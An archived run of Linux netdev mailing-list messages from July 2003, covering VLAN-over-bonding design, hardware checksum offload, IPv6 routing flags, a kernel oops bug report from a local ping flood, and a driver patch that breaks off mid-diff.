VLAN support on top of bonding > > > Hi All, > > Currently, when using 8021q VLAN module to work on top > of bonding, > everything seems to work OK, but there are some issues that > will not work > according to our analysis. For example, any self-generated > packets sent by > bonding itself (e.g. arp-mon, TLB learning packets, ALB arp > replies, etc.) > do not have the VLAN id tag in them, and thus will not go through the > switch. Also, in order to configure a VLAN interface, the underlying > interface must be configured first to IP address 0.0.0.0. > Since arp-mon > uses bond's IP address, this might cause further problems. Other issue > we've still not investigated, like what happens if bonding > needs to parse > a tagged packet for layer2/layer3 data, might still create > more problems. > > We have come up with some possible solution we would like to get > comments on. First of all, our main guide line was not to > duplicate code > segments that are in the VLAN module and put them in bonding. > Further, we > figured bonding should not need to know about how the VLAN > module handles > hardware acceleration. On the other hand, bonding does need > to know what > VLAN tags are being used so it may send packets successfully > through all > the switch ports, so some kind of policy needs to be defined. > > So here is what we've come up with until now. > > 1. Configuration > Need to decide between: > a. Block VLAN add/del operations when bond has no slaves. > b. Block enslave/release of slaves when bond has no VLAN > tags (needs a > module parameter). > c. Remove limitation of IP 0.0.0.0. > > 2. Indication > Need to decide between: > a. Add notification mechanism in VLAN module that bonding > may register > to listen to, and thus keep track of VLAN tags added/removed. > b. Register to listen to net device register/unregister > notifications > to monitor creation/destruction of VLAN devices. > Requires support > for figuring out if a net device is a VLAN device, and > also two vlan > calls like get_realdev() and get_vlan_id() exported. > c. Parse every packet going through bonding to collect VLAN tags. > > 3. Monitoring > In order for bonding to be able to generate tagged packets > on its own, > two major changes need to be done. One is split the vlan_start_xmit > function into insert_tag() and vlan_xmit(), so bonding may > choose the > required tag on its own, and let 8021q to the transmit. A > second change > is to split arp_send() into arp_create() and arp_send(), > so bonding may > pass all the usual parameters for arp creation, get a complete arp > packet and then pass it to 8021q for tag insertion on transmission. > > > Hardware acceleration > ===================== > When coming to analyze what is required for adding support for > VLAN hardware acceleration on top of bonding, other issues > come to mind. > Since add/del operations are defined and handshakes are > performed between > the VLAN module and the device driver, tracking VLAN tags is > simpler and > commands should just be propagated to the slaves. Enslaving/releasing > slaves should also be simple and just require adding/removing existing > VLAN tags from them. The problem is how to handle > configuration issues. > > 1. Since adding the first VLAN tag requires some additional > handshake, > can bonding support that operation on a bond that > already has slaves > and is running? > 2. What about removing the last tag from a bond? > 3. Should the bond device declare itself as "VLAN challenged" before > registering and remove that limitation only once it has slaves? > 4. Should the bond declare itself as fully hardware > acceleration capable > to benefit from "strong" slaves while performing regular VLAN > inserting/stripping for "weak" slaves? > 5. How can bonding generate untagged packets and send them via > hardware acceleration capable slaves (e.g. 802.3ad LACPDU) ? > > > -- > | Shmulik Hen | > | Israel Design Center (Jerusalem) | > | LAN Access Division | > | Intel Communications Group, Intel corp. | > > > - > To unsubscribe from this list: send the line "unsubscribe > linux-net" in > the body of a message to majordomo@vger.kernel.org > More majordomo info at http://vger.kernel.org/majordomo-info.html > From goemon@anime.net Tue Jul 15 11:07:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 11:07:42 -0700 (PDT) Received: from sasami.anime.net (sasami.anime.net [208.8.184.120] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FI7UFl002066 for ; Tue, 15 Jul 2003 11:07:31 -0700 Received: from localhost (goemon@localhost) by sasami.anime.net (8.11.6/8.11.6) with ESMTP id h6FHt9W05381; Tue, 15 Jul 2003 10:55:09 -0700 Date: Tue, 15 Jul 2003 10:55:09 -0700 (PDT) From: Dan Hollis To: Ben Greear cc: Shmulik Hen , bond-devel , linux-net , linux-netdev , "David S. Miller" , Jeff Garzik , Jay Vosburgh , Amir Noam , Noam Marom , Tsippy Mendelson Subject: Re: [Bonding-devel] Re: [RFC][bonding] Improve VLAN support on top of bonding In-Reply-To: <3F1438E1.5000600@candelatech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4058 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: goemon@anime.net Precedence: bulk X-list: netdev On Tue, 15 Jul 2003, Ben Greear wrote: > I'd consider ignoring the HW accel unless you can prove it actually helps > performance to a noticeable degree. I have never seen results of any benchmarking > related to this... For gigabit ethernet, it makes a *H*U*G*E* difference. -Dan -- [-] Omae no subete no kichi wa ore no mono da. [-] From greearb@candelatech.com Tue Jul 15 11:14:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 11:14:22 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FIEHFl003244 for ; Tue, 15 Jul 2003 11:14:18 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6FIDwKk017544; Tue, 15 Jul 2003 11:13:58 -0700 Message-ID: <3F144466.8010003@candelatech.com> Date: Tue, 15 Jul 2003 11:13:58 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Dan Hollis CC: Shmulik Hen , bond-devel , linux-net , linux-netdev , "David S. Miller" , Jeff Garzik , Jay Vosburgh , Amir Noam , Noam Marom , Tsippy Mendelson Subject: Re: [Bonding-devel] Re: [RFC][bonding] Improve VLAN support on top of bonding References: In-Reply-To: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4059 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Dan Hollis wrote: > On Tue, 15 Jul 2003, Ben Greear wrote: > >>I'd consider ignoring the HW accel unless you can prove it actually helps >>performance to a noticeable degree. I have never seen results of any benchmarking >>related to this... > > > For gigabit ethernet, it makes a *H*U*G*E* difference. I'm curious to see numbers. The VLAN shim is only inserting a small shim header, at at most shifting the first part of the packet when sent a pre-built packet. Maybe the hw-accel turns on tcp checksumming or something too?? > > -Dan -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From goemon@anime.net Tue Jul 15 11:17:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 11:17:07 -0700 (PDT) Received: from sasami.anime.net (sasami.anime.net [208.8.184.120] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FIH2Fl003586 for ; Tue, 15 Jul 2003 11:17:03 -0700 Received: from localhost (goemon@localhost) by sasami.anime.net (8.11.6/8.11.6) with ESMTP id h6FIGcg06021; Tue, 15 Jul 2003 11:16:38 -0700 Date: Tue, 15 Jul 2003 11:16:38 -0700 (PDT) From: Dan Hollis To: Ben Greear cc: Shmulik Hen , bond-devel , linux-net , linux-netdev , "David S. Miller" , Jeff Garzik , Jay Vosburgh , Amir Noam , Noam Marom , Tsippy Mendelson Subject: Re: [Bonding-devel] Re: [RFC][bonding] Improve VLAN support on top of bonding In-Reply-To: <3F144466.8010003@candelatech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4060 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: goemon@anime.net Precedence: bulk X-list: netdev On Tue, 15 Jul 2003, Ben Greear wrote: > Dan Hollis wrote: > > On Tue, 15 Jul 2003, Ben Greear wrote: > >>I'd consider ignoring the HW accel unless you can prove it actually helps > >>performance to a noticeable degree. I have never seen results of any benchmarking > >>related to this... > > For gigabit ethernet, it makes a *H*U*G*E* difference. > I'm curious to see numbers. The VLAN shim is only inserting > a small shim header, at at most shifting the first part of the packet > when sent a pre-built packet. > Maybe the hw-accel turns on tcp checksumming or something too?? That is exactly what it does. hw tcp checksumming helps a LOT at gbe rates -Dan -- [-] Omae no subete no kichi wa ore no mono da. [-] From krkumar@us.ibm.com Tue Jul 15 11:35:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 11:35:29 -0700 (PDT) Received: from e3.ny.us.ibm.com (e3.ny.us.ibm.com [32.97.182.103]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FIZEFl005652 for ; Tue, 15 Jul 2003 11:35:21 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e3.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6FIYSpW164670; Tue, 15 Jul 2003 14:34:28 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6FIYPrU082670; Tue, 15 Jul 2003 14:34:26 -0400 Message-ID: <3F14492C.30708@us.ibm.com> Date: Tue, 15 Jul 2003 11:34:20 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: kuznet@ms2.inr.ac.ru CC: yoshfuji@linux-ipv6.org, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 References: <200307150117.FAA06705@dub.inr.ac.ru> In-Reply-To: <200307150117.FAA06705@dub.inr.ac.ru> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4061 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev Hi Alexey, >>+ IFA_IFFLAGS, > > What's about ifa_flags? There is some space there, and the things > kept there now: TENTATIVE/DEPRECATED et al. are close relatives > of O/M. > > Alexey, O/M are not flags for addresses, but for interfaces. > > > But tell me, please, what is the difference between new _address_ > > > attribute IFA_IFFLAGS and already existing address attrbute ifa_flags? Conceptually these are different, one for address and one for interface. But I also agree to your point that these can both be enclosed within one attribute to return. If we agree to do it in this way, then we have to change the values of either of the two sets of #defines (if_flags & ifa_flags since they intersect). I propose changing the values of IFA_PERM/TENT/DEPRE/SECOND, etc, for no other reason other than the MANAGED/OTHER flags has values copied off from the RA (bitwise values of the icmpv6_nd_ra field of RA). It might make more meaning to keep 0x80 for field 'M' which is the first bit of the field, but let me know if this is not acceptable. > This does not pass through Occam's razor. Why not to give a filter to plain > RTM_GETROUTE? We did not implement filtering not because we do not want, > but because we (me, is more appropriate) are lazy. OK, I can change that to give a filter. Is it OK to add the filter to rtm_flags ? I was thinking of adding RTM_F_PREFIX, and rt6_dump_route() can pass this information to rt6_fill_node() which does filtering of routes based on whether this flag is set or not. Did I understand you correctly here ? > Also, I am not sure that the interface should include things sort of > > + if ((addr_type & (IPV6_ADDR_LINKLOCAL | IPV6_ADDR_LOOPBACK | > + IPV6_ADDR_MULTICAST)) != 0 || > + addr_type == IPV6_ADDR_ANY) > I can remove the check completely and introduce a new flag RTF_PREFIX_RT to distinguish between various route types. Are these modifications OK ? Thanks, - KK > For kernel all they are direct routes, if the application wants to apply > some policy not formulated in terms of filters for RTM_GETROUTE, let it > to filter itself. Moreover, I used to emphasize that user of rtnetlink > should not believe to reliability of kernel filtering. It is just necessary > measure to guarantee that a new application, which is aware of a new > attribute, will behave correctly with older kernels, which are not aware > of this attribute. Not a requirement, of course. > > Anyway, if you want to apply such specific policy, you can add a flag > to rtm_flags, which would say: RTM_F_OFFICIALLY_PREFIX and base filtering > on this flag, when it is given. > > Alexey > From ralph@istop.com Tue Jul 15 11:36:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 11:36:16 -0700 (PDT) Received: from smtp.istop.com (dci.doncaster.on.ca [66.11.168.194]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FIaAFl005851 for ; Tue, 15 Jul 2003 11:36:11 -0700 Received: from ns.istop.com (ns.istop.com [66.11.168.199]) by smtp.istop.com (Postfix) with ESMTP id 4315836957; Tue, 15 Jul 2003 14:36:10 -0400 (EDT) Date: Tue, 15 Jul 2003 14:36:10 -0400 (EDT) From: Ralph Doncaster Reply-To: ralph+d@istop.com To: Dan Hollis Cc: linux-netdev Subject: Re: [Bonding-devel] Re: [RFC][bonding] Improve VLAN support on top of bonding In-Reply-To: Message-ID: References: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4062 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ralph@istop.com Precedence: bulk X-list: netdev On Tue, 15 Jul 2003, Dan Hollis wrote: > That is exactly what it does. hw tcp checksumming helps a LOT at gbe rates This still doesn't make any sense. The copy from user-space to kernel space does the checksum as far as I recall (unless you use the router-not-host kernel build option). -Ralph From ralph@istop.com Tue Jul 15 12:01:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 12:01:22 -0700 (PDT) Received: from smtp.istop.com (dci.doncaster.on.ca [66.11.168.194]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FJ1DFl006764 for ; Tue, 15 Jul 2003 12:01:13 -0700 Received: from ns.istop.com (ns.istop.com [66.11.168.199]) by smtp.istop.com (Postfix) with ESMTP id 53C6236A27; Tue, 15 Jul 2003 15:01:12 -0400 (EDT) Date: Tue, 15 Jul 2003 15:01:11 -0400 (EDT) From: Ralph Doncaster Reply-To: ralph+d@istop.com To: Jordi Ros Cc: "netdev@oss.sgi.com" Subject: RE: TCP IP Offloading Interface In-Reply-To: Message-ID: References: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4063 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ralph@istop.com Precedence: bulk X-list: netdev On Mon, 14 Jul 2003, Jordi Ros wrote: > Note that Microsoft is considering TOE under its Scalable Networking Program. To keep linux competitive, I would encourage a healthy discussion on this matter. Again, TOE is not the goal but the means to deliver important technologies for the next generation of servers. This will be critical as the backbone of the Internet goes to all optical networks while the servers stay at the electronic domain. As shown by McKeown, "Circuit Switching in the Core", the line capacity of the optical fibers is doubling every 7 months while the processing CPU capacity (Moore's law) can only double every 18 months. Moore's law is borne out in practice; most optical tansmission developments are theory. 3 years ago the fastest circuit you could readily buy from a carrier (QWest, 360, Williams, etc) was OC192. Today I still can't contact a rep from any of those companies and order an OC768. Even so, as things currently stand in Linux, an application can send a stream of data from a file on disk to the network without any of the data touching the CPU. So we really don't need any new and convoluted way of accelerating network performance. > PROPRIETARY-CONFIDENTIAL INFORMATION INCLUDED And you expect to be taken seriously when you include a stupid disclaimer like this at the end of your email? -Ralph From goemon@anime.net Tue Jul 15 12:21:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 12:21:09 -0700 (PDT) Received: from sasami.anime.net (sasami.anime.net [208.8.184.120] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FJL4Fl007542 for ; Tue, 15 Jul 2003 12:21:05 -0700 Received: from localhost (goemon@localhost) by sasami.anime.net (8.11.6/8.11.6) with ESMTP id h6FJKtJ07613; Tue, 15 Jul 2003 12:20:55 -0700 Date: Tue, 15 Jul 2003 12:20:55 -0700 (PDT) From: Dan Hollis To: ralph+d@istop.com cc: linux-netdev Subject: Re: [Bonding-devel] Re: [RFC][bonding] Improve VLAN support on top of bonding In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4064 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: goemon@anime.net Precedence: bulk X-list: netdev On Tue, 15 Jul 2003, Ralph Doncaster wrote: > On Tue, 15 Jul 2003, Dan Hollis wrote: > > That is exactly what it does. hw tcp checksumming helps a LOT at gbe rates > This still doesn't make any sense. The copy from user-space to kernel > space does the checksum as far as I recall (unless you use the > router-not-host kernel build option). except that 2.5.x has zerocopy and I believe NFS supports it now as well fwiw I believe sendfile() implementation was motivated a lot by hw csum support... -Dan -- [-] Omae no subete no kichi wa ore no mono da. [-] From pekkas@netcore.fi Tue Jul 15 12:26:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 12:26:47 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FJQZFl007958 for ; Tue, 15 Jul 2003 12:26:36 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6FJQLM15235; Tue, 15 Jul 2003 22:26:21 +0300 Date: Tue, 15 Jul 2003 22:26:21 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: davem@redhat.com, , Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT In-Reply-To: <200307151428.SAA08491@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4065 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Tue, 15 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > > 1) modify /sbin/ip and /sbin/route (and the rest if any) so that they'll > > parse global next-hop information and resolve it for the kernel, and > > report the resolved information to the kernel (see the other thread) > > No, really. It is problem of user to supply reasonable values. Such addresses are link-locals, of link local scope only. A link-local IPv6 address is awfully difficult to remember and type for all of your possible links. The only reasonable value user could supply is a global address. If the user doesn't have to supply anything .. that's another thing. > Listen, tunnel needs an _IPv4_ address for destiantion of tunnel. > Because our routing does not permit to use different address family > as nexthop, we did trick presenting it as an IPv4-compat address. > We could do this differently, f.e. to use FFFF:EEEE:IPv4-addr:CCCC:DDDD > with the same success or any other randomly chosen encapsulation. > > And this silly combination is still _better_ than 6to4 address, which > contains redundant information, which can be mixed up with real _IPv6_ > 6to4 addresses and whihc contains IPv4 address in some place which > used to be identification of a network prefix. Note that what is redundant information in certain scenarios for the *kernel* may not be redundant information for the *user*. Please describe what you mean by "real IPv6 6to4 addresses". If the node processing those as a next-hop supports 6to4 and has the sit0 pseudointerface configured, the address will be but through the special handling. If the node doesn't support 6to4 or doesn't have the sit0 pseudointerface configured, the address will be processed as normal, as any other IPv6 nexthop. Right? I fail to see what's the fuss about redundant information. Redundant information can be ignored. This is not computer science theory, removing everything which is not directly relevant. The use of the same representation for the next-hop (2002:F00:BA::x) as an address (2002:BA:F00:y) is the only logical, user-friendly way. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From akpm@osdl.org Tue Jul 15 12:59:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 12:59:13 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FJx2Fl008852 for ; Tue, 15 Jul 2003 12:59:03 -0700 Received: from dhcp-140-237.pao.digeo.com (build.pdx.osdl.net [172.20.1.2]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6FJwQI16852; Tue, 15 Jul 2003 12:58:26 -0700 Date: Tue, 15 Jul 2003 12:51:21 -0700 From: Andrew Morton To: Jim Keniston Cc: jmorris@intercode.com.au, davem@redhat.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru, jkenisto@us.ibm.com Subject: Re: [PATCH] [1/2] kernel error reporting (revised) Message-Id: <20030715125121.315920a2.akpm@osdl.org> In-Reply-To: <3F143D0A.A052F0B6@us.ibm.com> References: <3F143D0A.A052F0B6@us.ibm.com> X-Mailer: Sylpheed version 0.9.0pre1 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4066 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: akpm@osdl.org Precedence: bulk X-list: netdev Jim Keniston wrote: > > +int kernel_error_event_iov(const struct iovec *iov, unsigned int nseg, > + u32 groups) > +{ > ... > + > + return netlink_broadcast(kerror_nl, skb, 0, ~0, GFP_ATOMIC); This appears to be deadlocky when called from interrupt handlers. netlink_broadcast() does read_lock(&nl_table_lock). But nl_table_lock is not an irq-safe lock. Possibly netlink_broadcast() can be made callable from hardirq context, but it looks to be non trivial. The various error and delivery handlers need to be reviewed, the kfree_skb() calls should be thought about, etc. From bwindle@fint.org Tue Jul 15 14:46:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 14:46:35 -0700 (PDT) Received: from mta02-srv.alltel.net (mta02.alltel.net [166.102.165.144]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FLkPFl012968 for ; Tue, 15 Jul 2003 14:46:26 -0700 Received: from morpheus ([151.213.163.48]) by mta02-srv.alltel.net with ESMTP id <20030715214624.MEHY7705.mta02-srv.alltel.net@morpheus>; Tue, 15 Jul 2003 16:46:24 -0500 Received: from bwindle (helo=localhost) by morpheus with local-esmtp (Exim 3.36 #1 (Debian)) id 19cXct-0000yy-00; Tue, 15 Jul 2003 17:46:23 -0400 Date: Tue, 15 Jul 2003 17:46:22 -0400 (EDT) From: Burton Windle X-X-Sender: bwindle@morpheus To: davem@redhat.com cc: netdev@oss.sgi.com Subject: 2.6.0-test1: oops in raw_rcv_skb Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4067 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: bwindle@fint.org Precedence: bulk X-list: netdev Hello. Forgive me if you don't want to see these; I already filed it at bugzilla.kernel.org (http://bugzilla.kernel.org/show_bug.cgi?id=937), but thought I saw in the list you wanted them emailed to the maintaiers as well. When doing a ping flood of another machine on my same network (using multiple instances of 'ping -f hostname &'), after about 10 seconds I get this oops, and the machine hangs: Unable to handle kernel paging request at virtual address c4f66068 printing eip: c02b6bd0 *pde = 00014067 *pte = 04f66000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[] Not tainted EFLAGS: 00010246 EIP is at raw_rcv_skb+0x190/0x260 eax: 00000040 ebx: c5321060 ecx: c4dae024 edx: 00000014 esi: c5160000 edi: c5321004 ebp: c4f66004 esp: c5161b80 ds: 007b es: 007b ss: 0068 Process ping (pid: 294, threadinfo=c5160000 task=c52cf000) Stack: c4f66000 c1169890 00001000 c532106c 00000216 00000000 c4f66000 0000005a c4f66004 c5321004 c4dae024 c510e004 c02b6d3d c5321004 c4f66004 c510e038 00000030 00000001 c5321004 c02b681d c5321004 c4f66004 6164050a 1964050a Call Trace: [] raw_rcv+0x9d/0x110 [] raw_v4_input+0xad/0x160 [] ip_local_deliver+0x9b/0x220 [] ip_rcv+0x396/0x49c [] kernel_map_pages+0x28/0x5c [] netif_receive_skb+0x181/0x210 [] process_backlog+0x89/0x120 [] net_rx_action+0x95/0x130 [] do_softirq+0xd5/0xe0 [] do_IRQ+0x185/0x230 [] common_interrupt+0x18/0x20 [] alloc_ldt+0x7b/0x1f0 [] kfree+0x204/0x340 [] kfree_skbmem+0x13/0x30 [] kfree_skbmem+0x13/0x30 [] __kfree_skb+0x6b/0xf0 [] raw_recvmsg+0x113/0x180 [] inet_recvmsg+0x5a/0x80 [] sock_recvmsg+0x9c/0xc0 [] kernel_map_pages+0x28/0x5c [] __alloc_pages+0x309/0x370 [] sockfd_lookup+0x1c/0x80 [] sys_recvfrom+0xb2/0x120 [] poll_freewait+0x44/0x50 [] do_select+0x1f1/0x340 [] sys_socketcall+0x1e6/0x2a0 [] syscall_call+0x7/0xb Code: 8b 45 64 89 3c 24 89 44 24 04 ff 97 50 01 00 00 eb b2 e8 59 <0>Kernel panic: Fatal exception in interrupt In interrupt handler - not syncing Distribution: Debian Testing Hardware Environment: Dual Pentium2 266, AIC-7880 SCSI, 3Com PCI 3c905C Tornado Software Environment: gcc 3.3.1, SMP kernel, preempt on -- Burton Windle burton@fint.org Linux: the "grim reaper of innocent orphaned children." from /usr/src/linux-2.4.18/init/main.c:461 From jgarzik@pobox.com Tue Jul 15 15:30:47 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 15:31:04 -0700 (PDT) Received: from www.linux.org.uk (IDENT:Z61Bcb52iN7sFbON3raqXd1Z+ywnS3Q/@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FMUjFl014372 for ; Tue, 15 Jul 2003 15:30:46 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19cYJn-0001m6-L2; Tue, 15 Jul 2003 23:30:43 +0100 Message-ID: <3F14807E.30402@pobox.com> Date: Tue, 15 Jul 2003 18:30:22 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: ralph+d@istop.com CC: Dan Hollis , linux-netdev Subject: Re: [Bonding-devel] Re: [RFC][bonding] Improve VLAN support on top of bonding References: In-Reply-To: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4068 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev Ralph Doncaster wrote: > On Tue, 15 Jul 2003, Dan Hollis wrote: > > >>That is exactly what it does. hw tcp checksumming helps a LOT at gbe rates > > > This still doesn't make any sense. The copy from user-space to kernel > space does the checksum as far as I recall (unless you use the > router-not-host kernel build option). Not for the zero-copy case. Jeff From shemminger@osdl.org Tue Jul 15 15:57:46 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 15:57:51 -0700 (PDT) Received: from mail.osdl.org (login.osdl.org [65.172.181.5]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FMvjFl015181 for ; Tue, 15 Jul 2003 15:57:46 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6FMvXI05437; Tue, 15 Jul 2003 15:57:33 -0700 Date: Tue, 15 Jul 2003 15:57:33 -0700 From: Stephen Hemminger To: "David S. Miller" Cc: netdev@oss.sgi.com Subject: [PATCH] dynamic net_device for serial eql balancer Message-Id: <20030715155733.0ee5a14d.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3 (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4069 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Patch against 2.6.0-test1 to dynamically allocate pseudo network device. Compiles and loaded/unloaded but don't have multi-port serial load balancing to test more fuly. diff -Nru a/drivers/net/eql.c b/drivers/net/eql.c --- a/drivers/net/eql.c Tue Jul 15 15:50:48 2003 +++ b/drivers/net/eql.c Tue Jul 15 15:50:48 2003 @@ -162,22 +162,12 @@ static char version[] __initdata = "Equalizer2002: Simon Janes (simon@ncm.com) and David S. Miller (davem@redhat.com)\n"; -static int __init eql_init(struct net_device *dev) +static void __init eql_setup(struct net_device *dev) { - static unsigned int version_printed; - equalizer_t *eql; + equalizer_t *eql = dev->priv; SET_MODULE_OWNER(dev); - if (version_printed++ == 0) - printk(version); - - dev->priv = kmalloc(sizeof (equalizer_t), GFP_KERNEL); - if (dev->priv == NULL) - return -ENOMEM; - memset(dev->priv, 0, sizeof (equalizer_t)); - eql = dev->priv; - init_timer(&eql->timer); eql->timer.data = (unsigned long) dev->priv; eql->timer.expires = jiffies + EQL_DEFAULT_RESCHED_IVAL; @@ -203,8 +193,6 @@ dev->type = ARPHRD_SLIP; dev->tx_queue_len = 5; /* Hands them off fast */ - - return 0; } static int eql_open(struct net_device *dev) @@ -598,23 +586,28 @@ return -EINVAL; } -static struct net_device dev_eql; +static struct net_device *dev_eql; static int __init eql_init_module(void) { - strcpy(dev_eql.name, "eql"); - dev_eql.init = eql_init; - if (register_netdev(&dev_eql) != 0) { - printk("eql: register_netdev() returned non-zero.\n"); - return -EIO; - } - return 0; + int err; + + printk(version); + + dev_eql = alloc_netdev(sizeof(equalizer_t), "eql", eql_setup); + if (!dev_eql) + return -ENOMEM; + + err = register_netdev(dev_eql); + if (err) + kfree(dev_eql); + 